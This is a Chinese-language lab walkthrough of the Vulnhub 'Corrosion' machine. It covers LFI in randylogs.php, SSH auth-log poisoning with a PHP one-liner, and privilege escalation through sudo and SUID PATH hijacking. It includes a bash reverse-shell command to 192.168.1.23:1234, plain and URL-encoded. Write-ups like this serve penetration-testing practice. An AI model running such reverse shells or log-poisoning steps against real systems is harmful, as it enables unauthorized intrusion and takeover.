Vulnhub靶场之Corrosion
cordium
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
Vulnhub靶场之Corrosion

一、环境搭建
靶场下载地址:http://www.vulnhub.com/entry/corrosion-1,730/,使用vm打开,配置kali和靶场处于同一个网络。
二、信息收集
主机发现
主机扫描
目录扫描
猜测需要更改ssh日志/var/log/auth.log文件,该文件中记录ssh登录失败的用户名,可以使用一句话木马来登录ssh,然后使用文件包含漏洞来包含该文件,达到执行一句话木马的目的。
FUZZ参数
文件包含漏洞
三、漏洞利用
SSH日志投毒
SSH登录失败的用户名密码会保存在ssh日志/var/log/auth.log文件中,可以使用一句话木马来登录ssh,然后利用randylogs.php中的LFI漏洞来包含/var/log/auth.log达到执行一句话木马的目的。
反弹SHELL
bash -c 'bash -i >& /dev/tcp/192.168.1.23/1234 0>&1' url编码 bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.23%2F1234%200%3E%261%27
四、内网信息收集
五、提权
SUDO滥用
手动写一个用来提权的easysysinfo.c文件,然后编译到/home/randy/tools/easysysinfo中,利用sudo执行来提权。
SUID滥用
Easysysinfo有suid位,可以用来提权,猜测easysysinfo是由压缩包中easysysinfo.c编译得来而来,查看源码得知cat未使用绝对路径,所以可以手动增添一个cat用来提权,修改环境变量$PATH使easysysinfo执行我们写的cat。
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 cordium 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏

sqli-labs payloads and key code
2022-03-13
Illegal mix of collations for operation “UNION”
2021-09-13
Python黑帽子——黑客与渗透测试编程之道
2021-05-31
文章目录